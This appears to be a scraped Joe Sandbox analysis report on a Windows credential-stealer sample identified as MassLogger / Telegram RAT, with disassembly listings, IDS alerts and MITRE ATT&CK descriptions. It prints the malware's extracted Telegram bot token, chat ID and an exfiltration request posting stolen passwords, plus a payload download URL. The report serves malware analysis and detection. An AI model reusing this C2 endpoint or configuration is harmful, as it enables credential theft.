lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85

Memory Dump Source

Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98

Source: 00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}
Source: WGi85dsMNp.exe.1476.2.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}

Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_354BD1EC CryptUnprotectData,		2_2_354BD1EC
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_354BD9D9 CryptUnprotectData,		2_2_354BD9D9

Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49784 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49784 -> 149.154.167.220:443

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31a138391b77Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.16.1 104.21.16.1
Source: Joe Sandbox View	IP Address: 193.122.130.0 193.122.130.0

Source: WGi85dsMNp.exe	Virustotal: Detection: 76%			Perma Link
Source: WGi85dsMNp.exe	ReversingLabs: Detection: 60%

Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then jmp 354B1042h	2_2_354B0C28
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then jmp 354BC985h	2_2_354BC638
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then jmp 354B0671h	2_2_354B03C4
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then jmp 354BC041h	2_2_354BBD88
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then jmp 354BB791h	2_2_354BB4EC
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then jmp 354B1042h	2_2_354B0F6F
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then jmp 354BEA48h	2_2_354BE790
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then jmp 354BE198h	2_2_354BDEF3
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then jmp 354BBBE9h	2_2_354BB944
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then jmp 354BC499h	2_2_354BC1F2
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then jmp 354BF2F8h	2_2_354BF053
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then jmp 354BB339h	2_2_354BB07F
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then jmp 354BE5F0h	2_2_354BE34B
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then jmp 354BEEA0h	2_2_354BEBF7
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then jmp 354BDD40h	2_2_354BDA9B
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then push 00000000h	2_2_35A9BDF0
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then jmp 35A916A8h	2_2_35A91400
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then jmp 35A9882Dh	2_2_35A98650
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then jmp 35A991B7h	2_2_35A98650
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then jmp 35A95058h	2_2_35A94DB0
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then jmp 35A92808h	2_2_35A92560
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then jmp 35A91F58h	2_2_35A91CB0
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then jmp 35A97770h	2_2_35A974C8
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then jmp 35A96EC0h	2_2_35A96C18
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then jmp 35A91250h	2_2_35A90FA8
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then jmp 35A96A68h	2_2_35A967C0
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then jmp 35A961B8h	2_2_35A95F10
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then jmp 35A94218h	2_2_35A93F70
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then jmp 35A93968h	2_2_35A936C0
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then jmp 35A930B8h	2_2_35A92E10
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then jmp 35A95908h	2_2_35A95660
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then jmp 35A92C60h	2_2_35A929B8
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	2_2_35A98193
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then push 00000000h	2_2_35A9C92F
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then jmp 35A923B0h	2_2_35A92108
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then jmp 35A94ACAh	2_2_35A94820
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then jmp 35A97318h	2_2_35A97070
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then jmp 35A91B00h	2_2_35A91858
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	2_2_35A9CBE7
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then jmp 35A94670h	2_2_35A943C8
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then jmp 35A93DC0h	2_2_35A93B18
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then jmp 35A96610h	2_2_35A96368
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	2_2_35A97B63
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	2_2_35A98373
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then jmp 35A95D60h	2_2_35A95AB8
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then jmp 35A954B0h	2_2_35A95208
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 4x nop then jmp 35A93510h	2_2_35A93268

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49738 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49705 -> 142.250.186.78:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1TlOsdPEqqbm9Tz6zptQP3sv7zEQ9o8Yz HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1TlOsdPEqqbm9Tz6zptQP3sv7zEQ9o8Yz&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report WGi85dsMNp.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: MassLogger

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Iw\14-scaled.jpg

C:\Users\user\AppData\Local\Iw\Concinnate46.Ove

C:\Users\user\AppData\Local\Iw\Unnumberable\Kbmandsskole.str

C:\Users\user\AppData\Local\Iw\Unnumberable\Sensuousnesses.opk

C:\Users\user\AppData\Local\Iw\Unnumberable\prepares.pli

C:\Users\user\AppData\Local\Iw\Unnumberable\sdelighedsforbrydelses.Kan

C:\Users\user\AppData\Local\Temp\nsdC34C.tmp

C:\Users\user\AppData\Local\Temp\nsoC476.tmp\System.dll

Static File Info

General

File Icon

Windows Analysis Report
WGi85dsMNp.exe

Function 004034A5 Relevance: 84.4, APIs: 32, Strings: 16, Instructions: 410
stringfilecomCOMMON

Function 00404DCC Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
windowmemoryCOMMON

Function 00405AFA Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Function 00403E86 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Function 00403AD8 Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215
stringregistryCOMMON

Function 00402F30 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 203
memoryCOMMON

Function 0040640A Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209
stringCOMMON

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Function 00406752 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 0040591F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Function 6F941777 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Function 00402032 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73
libraryCOMMON

Function 004023E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Function 00405F0D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre